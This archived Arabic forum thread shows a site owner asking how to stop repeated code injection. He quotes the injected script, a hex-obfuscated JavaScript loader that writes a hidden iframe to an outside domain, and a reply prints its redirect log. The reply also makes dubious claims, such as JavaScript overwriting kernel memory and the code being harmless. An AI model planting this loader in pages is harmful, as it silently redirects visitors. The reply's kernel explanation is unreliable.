سوالف اندرويد




العودة   سوالف سوفت > سوالف الشبكات والاستضافة وما يتعلق بهما > الشبكات والخوادم وقواعد البيانات
فزعتكم شباب فزعتكم شباب
التسجيل المدوّنات البحث مشاركات اليوم جعل الأقسام مقروءة

الرد على الموضوع
 
LinkBack أدوات الموضوع
عضو نشيط
#1  
فزعتكم شباب

السلام عليكم ورحمة الله وبركاته

اخواني اعضاء سوالف فيه شخص مسوي لي صداع يدرج كود في صفحات موقعي,, وحست ابغى اعرف كيف اوقف الثغرة هذي,,

الكود اللي يدخله هذا هو
كود:
<script type="text/javascript">function uavxgizkldzyckm(fuqgkpou){var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqpxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, ""));</script>
وهذا على صفحات php و html وحتى اللي محمية بباسورد htacsses.

اتمنى احد يفيدنا كيف أحل مشكلة هذه الثغرة,,,,






__________________
http://vb.alFaris.NET
---------------------------
alFaris is offline   قديم 12-05-2008, 10:00 PM
الرد مع إقتباس
F_X
عضو نشيط
#2  

اذا كنت صاحب موقع فهذا امر لا تقدر ان تقوم بعمله الا المستضيف

للمعلومة عادة هذا يكون هجوم Js Malicious كود جافا خبيث مشفر يقوم بضرب جميع الملفات التى تحمل الملفات بإسم index و login على الخادم فأي شخص يقوم بفتح صفحة تحمل هذا الكود يقوم الكود ببدأ عمله على اساسه توجيه الشخص لرابط معين والكود الذي قمت بسردة بعد فك تشفيره يذهب الى الراوبط التالية

كود:
-  Process : iexplore.exe[552] (6)                                                                                                                                                                                            
   1    13:03:09:296  0.249 s      GET     302     337   text/html        http://top100-counter.com/top100/index.php                                http://top100-counter.com/tds/in.cgi?default  
   2    13:03:09:562  0.265 s      GET     302     518   text/html        http://top100-counter.com/tds/in.cgi?default                              http://google.com                             
   3    13:03:10:046  0.204 s      GET     301     550   text/html        http://google.com/                                                        http://www.google.com/                        
   4    13:03:10:375  0.124 s      GET     302     568   text/html        http://www.google.com/                                                    http://www.google.com.eg/                     
   5    13:03:10:625  0.156 s      GET     200     3557  text/html        http://www.google.com.eg/                                                                                               
   6    13:03:10:812  0.124 s      GET     304     79    text/javascript  http://www.google.com.eg/extern_js/f/CgJhchICZWcrMBM4ACw/txcTs-aSqaA.js
اري انها روابط عادية للعدادات تقريباً ولكن الكود لا تقلق منه فلا يقوم بضرب محتوي الصفحة
الكود عادة ما تجده في اخر الصفحة او في اول الصفحة في كل ملف
الحل اذا كنت المستضيف هو تغير كلمة مرور الخادم وايضاً المواقع المصابة ومسح الكود من جميع الملفات وعمل بحث عن اي backdoors او trojan في الخادم وايضاً عمل block لمصدر الكود اذا كان يحتوي على رابط متفيرس

والاهم من ذلك هو ترقية الكيرنيل الخاص بالخادم لإنه هو السبب الرئيسي لذلك فقد يقوم كود الجافا بالكتابة على memory الخاصة بالكيرنيل حتى اذا قمت بحذف الكود سيعاود الرجوع مرة اخري

بعد ما تقوم بعمل البحث الشامل وسد الثغرات تقوم بعمل reboot للخادم

المصدر
RETIRED: Linux Kernel Multiple Prior to 2.6.24.1 Multiple Memory Access Vulnerabilities
F_X is offline   قديم 13-05-2008, 01:24 PM
الرد مع إقتباس
عضو نشيط
#3  

الله يعطيك الف عافيه اخي الكريم

السيرفر خاص فيني,, بس ياليت حبه حبه علي انا من زمان عن الثغرات انشغالي بالعمل مايعطيني وقت ابداً,,,

ياليت تفزع وتشيك لي على السيرفر اخوي وحقك محفوظ,,,

وهذا ماسنجري
alfaris@alfaris.net






__________________
http://vb.alFaris.NET
---------------------------
alFaris is offline   قديم 14-05-2008, 06:35 PM
الرد مع إقتباس
الرد على الموضوع

« شرح تركيب الديجى شات والجافا على السيرفر واعطاء بورت خاص لهم | موقع عالمي لأصحاب السيرفرات web server talk »


أدوات الموضوع

قوانين المشاركات
لا يمكنك كتابة مواضيع جديدة
لا يمكنك إضافة ردود
لا يمكنك إرسال مرفقات
لا يمكنك تعديل مشاركاتك
كود vB متاح
كود [IMG] متاح
كود HTML غير متاح
Trackbacks are متاح
Pingbacks are متاح
Refbacks are متاح


المواضيع المشابهه
الموضوع كاتب الموضوع القسم الردود آخر مشاركة
[تمبلت] فعاليات المنتدى "حصري من برمجة شباب الإمارات" لا يفوتكم روعهـ شباب الإمارات الهاكات والإضافات 2 28-12-2007 09:44 PM
فزعتكم شباب في ENOM ولد جده عروض البيع وطلبات الشراء في أسماء النطاقات Domain Names 1 17-03-2007 09:31 PM
يا شباب فزعتكم في منتدى اسلامي أبو سليمان الإصلاح والصيانة 2 24-09-2006 09:04 AM
شباب أبي فزعتكم أحمد86 الإصلاح والصيانة 0 02-01-2002 01:17 PM
يا شباب فزعتكم (برنامج php ضروري) أدخل وشوف almohtrf الويب والويب 2.0 والـ Semantic Web 6 27-11-2001 06:30 PM


جميع الأوقات بتوقيت غرينتش +3. الوقت الآن هو 11:47 AM.

الإتصال بنا - الإعلان في سوالف سوفت - سوالف سوفت - الأرشيف - للأعلى - خريطة سوالف